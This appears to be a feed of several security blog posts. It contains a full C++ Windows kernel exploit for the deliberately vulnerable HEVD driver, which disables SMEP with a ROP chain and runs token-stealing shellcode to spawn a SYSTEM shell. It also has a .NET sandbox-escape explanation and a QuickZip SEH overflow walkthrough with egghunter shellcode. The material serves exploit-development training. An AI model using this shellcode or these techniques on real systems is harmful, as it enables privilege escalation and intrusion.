  • To @abatchy17 for his awesome blog post on his SMEP bypass here: https://www.abatchy.com/2018/01/kernel-exploitation-4
  • To @ihack4falafel for helping me figure out where to return to after running my shellcode.

And as this is the last HEVD blog post, thanks to everyone who got me this far. As I’ve said every post so far, nothing I was doing is my own idea or technique, was simply recreating their exploits (or at least trying to) in order to learn more about the bug classes and learn more about the Windows kernel. (More thoughts on this later in a future blog post).

SMEP

We’ve already completed a Stack Overflow exploit for HEVD on Windows 7 x64 here; however, the problem is that starting with Windows 8, Microsoft implemented a new mitigation by default called Supervisor Mode Execution Prevention (SMEP). SMEP detects kernel mode code running in userspace stops us from being able to hijack execution in the kernel and send it to our shellcode pointer residing in userspace.

Bypassing SMEP

Taking my cues from Abatchy, I decided to try and bypass SMEP by using a well-known ROP chain technique that utilizes segments of code in the kernel to disable SMEP and then heads to user space to call our shellcode.

In the linked material above, you see that the CR4 register is responsible for enforcing this protection and if we look at Wikipedia, we can get a complete breakdown of CR4 and what its responsibilities are:

20 SMEP Supervisor Mode Execution Protection Enable If set, execution of code in a higher ring generates a fault.

So the 20th bit of the CR4 indicates whether or not SMEP is enforced. Since this vulnerability we’re attacking gives us the ability to overwrite the stack, we’re going to utilize a ROP chain consisting only of kernel space gadgets to disable SMEP by placing a new value in CR4 and then hit our shellcode in userspace.

Getting Kernel Base Address

The first thing we want to do, is to get the base address of the kernel. If we don’t get the base address, we can’t figure out what the offsets are to our gadgets that we want to use to bypass ASLR. In WinDBG, you can simply run lm sm to list all loaded kernel modules alphabetically:

---SNIP---
fffff800`10c7b000 fffff800`1149b000   nt
---SNIP---

We need a way also to get this address in our exploit code. For this part, I leaned heavily on code I was able to find by doing google searches with some syntax like: site:github.com NtQuerySystemInformation and seeing what I could find. Luckily, I was able to find a lot of code that met my needs perfectly. Unfortunately, on Windows 10 in order to use this API your process requires some level of elevation. But, I had already used the API previously and was quite fond of it for giving me so much trouble the first time I used it to get the kernel base address and wanted to use it again but this time in C++ instead of Python.

Using a lot of the tricks that I learned from @tekwizz123’s HEVD exploits, I was able to get the API exported to my exploit code and was able to use it effectively. I won’t go too much into the code here, but this is the function and the typedefs it references to retrieve the base address to the kernel for us:

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG				 Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

This code imports NtQuerySystemInformation from nt.dll and allows us to use it with the System Module Information parameter which returns to us a nice struct of a ModulesCount (how many kernel modules are loaded) and an array of the Modules themselves which have a lot of struct members included a Name. In all my research I couldn’t find an example where the kernel image wasn’t index value 0 so that’s what I’ve implemented here.

You could use a lot of the cool string functions in C++ to easily get the base address of any kernel mode driver as long as you have the name of the .sys file. You could cast the Modules.Name member to a string and do a substring match routine to locate your desired driver as you iterate through the array and return the base address. So now that we have the base address figured out, we can move on to hunting the gadgets.

Hunting Gadgets

The value of these gadgets is that they reside in kernel space so SMEP can’t interfere here. We can place them directly on the stack and overwrite rip so that we are always executing the first gadget and then returning to the stack where our ROP chain resides without ever going into user space. (If you have a preferred method for gadget hunting in the kernel let me know, I tried to script some things up in WinDBG but didn’t get very far before I gave up after it was clear it was super inefficient.) Original work on the gadget locations as far as I know is located here: http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html

Again, just following along with Abatchy’s blog, we can find Gadget 1 (actually the 2nd in our code) by locating a gadget that allows us to place a value into cr4 easily and then takes a ret soon after. Luckily for us, this gadget exists inside of nt!HvlEndSystemInterrupt.

We can find it in WinDBG with the following:

kd> uf HvlEndSystemInterrupt
nt!HvlEndSystemInterrupt:
fffff800`10dc1560 4851            push    rcx
fffff800`10dc1562 50              push    rax
fffff800`10dc1563 52              push    rdx
fffff800`10dc1564 65488b142588610000 mov   rdx,qword ptr gs:[6188h]
fffff800`10dc156d b970000040      mov     ecx,40000070h
fffff800`10dc1572 0fba3200        btr     dword ptr [rdx],0
fffff800`10dc1576 7206            jb      nt!HvlEndSystemInterrupt+0x1e (fffff800`10dc157e)

nt!HvlEndSystemInterrupt+0x18:
fffff800`10dc1578 33c0            xor     eax,eax
fffff800`10dc157a 8bd0            mov     edx,eax
fffff800`10dc157c 0f30            wrmsr

nt!HvlEndSystemInterrupt+0x1e:
fffff800`10dc157e 5a              pop     rdx
fffff800`10dc157f 58              pop     rax
fffff800`10dc1580 59              pop     rcx // Gadget at offset from nt: +0x146580
fffff800`10dc1581 c3              ret

As Abatchy did, I’ve added a comment so you can see the gadget we’re after. We want this:

pop rcx

ret routine because if we can place an arbitrary value into rcx, there is a second gadget which allows us to mov cr4, rcx and then we’ll have everything we need.

Gadget 2 is nested within the KiEnableXSave kernel routine as follows (with some snipping) in WinDBG:

kd> uf nt!KiEnableXSave
nt!KiEnableXSave:

---SNIP---

nt! ?? ::OKHAJAOM::`string'+0x32fc:
fffff800`1105142c 480fbaf112      btr     rcx,12h
fffff800`11051431 0f22e1          mov     cr4,rcx // Gadget at offset from nt: +0x3D6431
fffff800`11051434 c3              ret

So with these two gadgets locations known to us, as in, we know their offsets relative to the kernel base, we can now implement them in our code. So to be clear, our payload that we’ll be sending will look like this when we overwrite the stack:

  • ‘A’ characters * 2056
  • our pop rcx gadget
  • The value we want rcx to hold
  • our mov cr4, rcx gadget
  • pointer to our shellcode.

So for those following along at home, we will overwrite rip with our first gadget, it will pop the first 8 byte value on the stack into rcx. What value is that? Well, it’s the value that we want cr4 to hold eventually and we can simply place it onto the stack with our stack overflow. So we will pop that value into rcx and then the gadget will hit a ret opcode which will send the rip to our second gadget which will mov cr4, rcx so that cr4 now holds the SMEP-disabled value we want. The gadget will then hit a ret opcode and return rip to where? To a pointer to our userland shellcode that it will now run seemlessly because SMEP is disabled.

You can see this implemented in code here:

 BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

CR4 Value

Again, just following along with Abatchy, I’ll go ahead and place the value 0x70678 into cr4. In binary, 1110000011001111000 which would mean that the 20th bit, the SMEP bit, is set to 0. You can read more about what values to input here on j00ru’s blog post about SMEP.

So if cr4 holds this value, SMEP should be disabled.

Restoring Execution

The hardest part of this exploit for me was restoring execution after the shellcode ran. Unfortunately, our exploit overwrites several register values and corrupts our stack quite a bit. When my shellcode is done running (not really my shellcode, its borrowed from @Cneelis), this is what my callstack looked like along with my stack memory values:

Restoring execution will always be pretty specific to what version of HEVD you’re using and also perhaps what build of Windows you’re on as the some of the kernel routines will change, so I won’t go too much in depth here. But, what I did to figure out why I kept crashing so much after returning to the address in the screenshot of HEVD!IrpDeviceIoCtlHandler+0x19f which is located in the right hand side of the screenshot at ffff9e8196b99158, is that rsi is typically zero’d out if you send regular sized buffers to the driver routine.

So if you were to send a non-overflowing buffer, and put a breakpoint at nt!IopSynchronousServiceTail+0x1a0 (which is where rip would return if we took a ret out our address of ffff9e8196b99158), you would see that rsi is typically 0 when normally system service routines are exiting so when I returned, I had to have an rsi value of 0 in order to stop from getting an exception.

I tried just following the code through until I reached an exception with a non-zero rsi but wasn’t able to pinpoint exactly where the fault occurs or why. The debug information I got from all my bugchecks didn’t bring me any closer to the answer (probably user error). I noticed that if you don’t null out rsi before returning, rsi wouldn’t be referenced in any way until a value was popped into it from the stack which happened to be our IOCTL code, so this confused me even more.

Anyways, my hacky way of tracing through normally sized buffers and taking notes of the register values at the same point we return to out of our shellcode did work, but I’m still unsure why 😒.

Conclusion

All in all, the ROP chain to disable SMEP via cr4 wasn’t too complicated, this could even serve as introduction to ROP chains for some in my opinion because as far as ROP chains go this is fairly straightforward; however, restoring execution after our shellcode was a nightmare for me. A lot of time wasted by misinterpreting the callstack readouts from WinDBG (a lesson learned). As @ihack4falafel says, make sure you keep an eye on @rsp in your memory view in WinDBG anytime you are messing with the stack.

Exploit code here.

Thanks again to all the bloggers who got me through the HEVD exploits:

Huge thanks to HackSysTeam for developing the driver for us to all practice on, can’t wait to tackle it on Linux!

#include <iostream>
#include <string>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL                   0x222003

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver" << endl;
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: 0x" << hex
        << (INT64)hFile << endl;

    return hFile;
}

void send_payload(HANDLE hFile, INT64 kernel_base) {

    cout << "[>] Allocating RWX shellcode..." << endl;

    // slightly altered shellcode from 
    // https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
    // thank you @Cneelis
    BYTE shellcode[] =
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
        "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
        "\x4D\x8B\x88\xf0\x02\x00\x00"              // mov r9, [r8 + 2f0h]      ; ActiveProcessLinks list head
        "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
        //find_system_proc:
        "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
        "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
        "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
        "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
        "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
        //found_system:
        "\x48\x8B\x41\x68"                          // mov rax, [rcx + 68h]     ; Offset from ActiveProcessLinks to Token
        "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
        "\x49\x89\x80\x58\x03\x00\x00"              // mov [r8 + 358h], rax     ; Copy SYSTEM token to current process's token
        "\x48\x83\xC4\x40"                          // add rsp, 040h
        "\x48\x31\xF6"                              // xor rsi, rsi             ; Zeroing out rsi register to avoid Crash
        "\x48\x31\xC0"                              // xor rax, rax             ; NTSTATUS Status = STATUS_SUCCESS
        "\xc3";

    LPVOID shellcode_addr = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));

    cout << "[>] Shellcode allocated in userland at: 0x" << (INT64)shellcode_addr
        << endl;

    BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

    // keep this here for testing so you can see what normal buffers do to subsequent routines
    // to learn from for execution restoration
    /*
    BYTE input_buff[2048] = { 0 };
    memset(input_buff, '\x41', 2048);
    */

    cout << "[>] Input buff located at: 0x" << (INT64)&input_buff << endl;

    DWORD bytes_ret = 0x0;

    cout << "[>] Sending payload..." << endl;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] DeviceIoControl failed!" << endl;
    }
}

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

void spawn_shell() {

    cout << "[>] Spawning nt authority/system shell..." << endl;

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL,
        NULL,
        NULL,
        0,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi);
}

int main() {

    HANDLE hFile = grab_handle();

    INT64 kernel_base = get_kernel_base();
    send_payload(hFile, kernel_base);
    spawn_shell();
}

The Summer of PWN

By: h0mbre
5 May 2020 at 04:00

Summer Plans

Now that I finished the HEVD series of posts, it’s time for me to switch gears. The series became more of a chore as I progressed and the excercise felt quite silly for a few reasons. Primarily, there are still so many fundamental binary exploitation concepts that I still don’t know. Why was I spending so much time on very esoteric material when I haven’t even accomplished the basics? The material was tied closely to my wanting to take AWE with Offsec, but since that is not happening, I get to focus now on going back to the basics.

For the forseeable future, I’m going to be working primarily on leveling up my pwn skills by doing CTF challenges, reversing, analyzing malware, and developing.

Some of the tools I’m going to be using this summer (I’ll update this as I go along):

I will be keeping a daily log of everything I do and will publish it so those trying accomplish similar goals can see what I tried. I’ll also make a post at the end detailing what went right and what went wrong.

I’m taking a purposeful break from blogging so that I can focus on leveling up. Blogging takes a lot of my time and it’s interfering with my ability to put hours into getting better. I will hopefully be able to do a write-up detailing how I exploited a bug I found in another Windows kernel mode driver.

Keeping track of the Linux pwn challenge exploits here.

Until then, see you on the other side!

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

By: tiraniddo
7 May 2020 at 23:12
It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
   
I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression lambda = (o,e) => File.OpenRead(@"C:\SomePath")
EventHandle f = lambda.Compile()

We're still using a lambda, surely nothing has changed? We'll let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll creation something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore.


QuickZip 4.60 SEH Based Buffer Overflow w/ Egghunter

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability

Kali Linux
Windows Vista
QuickZip 4.60


Bug found by: corelancod3r (http://corelan.be:8800)
Software Link: http://www.quickzip.org/downloads.html


GitHub:https://github.com/pyt3ra/QuickZip_4_60_SEH-Based-Buffer-Overflow

~~~~~~//******//~~~~~~

This is another SEH based buffer overflow with an egghunter implementation. A more detailed explanation that I wrote about an egghunter implementation can be found here: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

You can find numerous write-ups about this vulnerability and exploit it. This buffer overflow vulnerability gives us a good mix of shellcode encoding due to restricted characters as well as how to implement an egghunter. 

I'm doing this as part of my preparation of Offensive Security Certified Expert (OSCE) certification

0x0 - Setup

Our Proof-of-Concept creates a .zip file that we will access using QuickZip.





0x1 - Fuzzing

As usual, step one in exploit development is fuzzing. This allows us to examine how the program responds when we introduce a buffer (oversized) to it.

We will be using the fuzzer from corelan as shown below.


We examine the crash using immunity debugger and we can see that have successfully overwritten the SEH handler with 41s.


0x2 - Calculating the offset

We will utilize Metasploit's pattern_create.rb and pattern_offset.rb

First, we create unique characters of 4068 bytes and update our POC



We check the SEH chain after the crash to get the offset values

SEH: 6B41396A
nSEH: 41386A41


Second, we calculate these values using pattern_offset.rb


Finally, we update our POC and verify if these values are correct.

If everything is correct, we should see Bs at byte 294 and Cs at byte 298.



Our values are correct as we see the 43s and 42s overwrite both SEH and nSEH respectively.


0x3 - Verifying Restricted Characters

At this point, we are now ready to find an address to redirect the SEH handler. However, before we waste our time looking for an address, we will need to verify first if there are restricted characters. 

First, I worked on the first 128 bytes (x01 to x7F)

I sent the characters to the program and carefully watching how the program responds to the characters. If it gets mangled/truncated/updated, then it's a bad character.

After numerous tries, I was able to narrow down the restricted characters to the following:

'\x10\x0f\x14\x15\x2f\x3d\x3a\x5b'

Updated POC below:


Second, I worked with the other 128 bytes (x80 to xff)

Interestingly, hex characters 80 and above are changed to an arbitrary hex character.

I sent the following characters...


...and we see the following conversion in Immunity Debugger

The table below shows the conversion (not a complete list).



0x4 - POP-PO-RET address!

Now that we know which characters are not allowed, we are ready to find a POP-POP-RET address.

Lucky for us, Immunity Debugger's mona.py module enables an easier way to find a POP-POP-RET address. 

There were multiple addresses found.

Although not ideal since it has null bytes, we will be using address 00435133


We can verify that this is indeed a POP-POP-RET address by searching for it.


We can update our POC with this address and see if our SEH handler gets redirected to it. 

Note that the address has to be in little-endian.


We fire up the POC and we have successfully redirected the SEH handler as shown below:




…once we take the pop-pop-ret, we then get redirected to our nseh values (EBs)

Note that our  Ds are nowhere to be found now, however, our As are easily accessible which is just right above our nSEH. This means our initial jump will have to be a reverse jump to the beginning of our As that should get us at least 127 bytes of address space to further jump to a bigger space (Ds location)


0x5 - First Jump


Normally, we would be able to easily to a reverse jump short 80 (EB 80). However, note that any hex character of 80 or over is restricted and converts to a different hex character.

More info about jump shorts (forward and reverse) can be found here: https://thestarman.pcministry.com/asm/2bytejumps.htm

If we go back to our bad characters table…we can see that hex 89 and 9F translates to EB and 83 respectively.

89
EB
9F
83

Here's how the EB 83 instructions would work as shown in Immunity. 


We can now update our POC with our first jump


We see our EB 83 first jump in SEH chain


We take the pop-pop-ret and we successfully hit our first jump…from 0012FBB0 to 0012FB35


0x6 - Second Jump - Egghunter

Remember that the address space for our Ds is missing now (still in memory). This is where ideally where reverse shellcode would be. 

Note above that our dump doesn't show the address space where are Ds are close to our As.

Just because we can't find it doesn't mean it is missing…this is where an egghunter shellcode comes in to play.

Here's a write-up that I did about egghunter: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

Mona.py also has a module to create an egghunter.

Note: I will be using a different egghunter

Due to restricted characters, we will need to carve out our egghunter shellcode so I will be using the egghunter shellcode that I used for OSCE prep (I spent way too much time carving them).

Also, note that I did another EB 83 at the beginning of our second jump to allow another 120+ bytes of address space as I noticed that the first jump wasn't enough space
  
Before we can start carving out the egghunter shellcode, we will need to align the ESP to point to the space below our first EB 08  at address 0012FB8D--this is where our egghunter shellcode will be decoded. 

We can see that ESP is currently pointed at 012F574 and we want to point to 0012FB8D


We will need to add 1561 to ESP


To align ESP, we need the following instructions:

PUSH ESP                   
POP EAX
ADD AX, 619
PUSH EAX
POP ESP

Keep in mind that we still need to avoid restricted characters...fortunately, the opcodes that correspond  to these instructions are not restricted

We execute the following instructions and we can see that our ESP now points to 0012FB8D


Again, we update our POC with our initial ESP realignment which will be the beginning of our egghunter shellcode


With our ESP aligned to where we want it to point....we can start carving out our egghunter shellcode.

Here's the original egghunter shellcode broken down into 4 bytes

#original egg hunter shellcode
\x68\x81\xcA\xFF
\x0F\x42\x52\x6A
\x02\x58\xCD\x2E
\x3C\x05\x5A\x74
\xEF\xb8\x54\x30
\x30\x57\x8b\xFA
\xAF\x75\xea\xAF
\x75\xE7\xFF\xE7

We will be using the EAX register to carve out the egghunter. Note that we need to zero out EAX first before we execute SUB instructions. We start from the last 4 bytes and work our way up.

zero_out_eax = "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"

This whole carving thing is straight black magic...it never ceases to amaze me.

#\x75\xe7\xff\xe7
#using hex/dword in windows calc
#0 - E7FFE775 = 1800 188B
#7950 5109 + 7950 5109 + 255F7679 = 1800 188B
#0 - 07950 5109 - 79505109 - 255F7679 = E7FFE775


These 4 bytes are encoded by doing some SUB instructions on EAX, then it gets pushed to the stack, and then they get decoded at the ESP address.



We will be doing this for the other 28 bytes

#\xaf\x75\xea\xaf
#using hex/dword in windows calc
#0 - AFEA75AF = 5015 8A51
#71094404 + 71094404  + 6E03 0249‬ =  5015 8A51
#0 - 71094404 - 71094404  - 6E03 0249 = AFEA75AF



\x30\x57\x8b\xfa
#using hex/dword in windows calc
#0 - FA8B 5730 = 0574 A8D0‬
#55093131 + 55093131  + 5B62 466E = 0574 A8D0‬
#0 - 55093131 - 55093131  - 5B62 466E = FA8B 5730


\xef\xb8\x54\x30
#using hex/dword in windows calc
#0 - 3054 B8EF = CFAB 4711
#56316666 +56316666  + 2348 7A45 = CFAB 4711
#0 - 56316666  - 56316666  - 2348 7A45 = 3054 B8EF



At this point, we have successfully carved out the first 16 bytes of our egghunter shellcode.

Note that we are getting close  our second EB 83 jmp…we will need to jump over this to get to the next 127 bytes of address space

I made a mistake on the ESP realignment that resulted in wasted address space. ESP should have been pointed to the end of our 41s as the stack grows bigger, the address becomes smaller.

This means we need ESP to be pointing at address 0012FBAC



Adjusted ESP alignment


This gives us about extra 32 bytes of address space….every byte counts!

We finish up the first 128 bytes by adding the first half of our zero_out_eax instructions and adding a jump short 10 bytes to go over the second EB 83 (I think we could have looped around too and just overwrite the first 16 bytes of our egghunter shellcode).



Our jump short brings us from address 0012FB2F to 0012FB3B and we successfully get over the second EB 83



Now we continue encoding the rest of our egghunter shellcode


#\x3c\x05\x5a\x74
#using hex/dword in windows calc
#0 - 745A053C = 8BA5 FAC4
#41214433 + 41214433 + 0963 725E = 8BA5 FAC4
#0 - 41214433 - 41214433 - 0963 725E = 745A053C


#\x02\x58\xcd\x2e
#using hex/dword in windows calc
#0 - 2ECD5802 = D132 A7FE
#657F3165 + 657F3165 + 06344534 =  D132 A7FE
#0 - 657F3165 - 657F3165 - 06344534 = 2ECD5802



Finally, we hit our last 4 bytes



That completes our egghunter shellcode…with literally 6 bytes left to spare with our address space

To test if our egghunter can find our egg, we add our egg "T00W" to the beginning of our Ds…and see if we can find it

...and we are successful. We found our Ds address space.



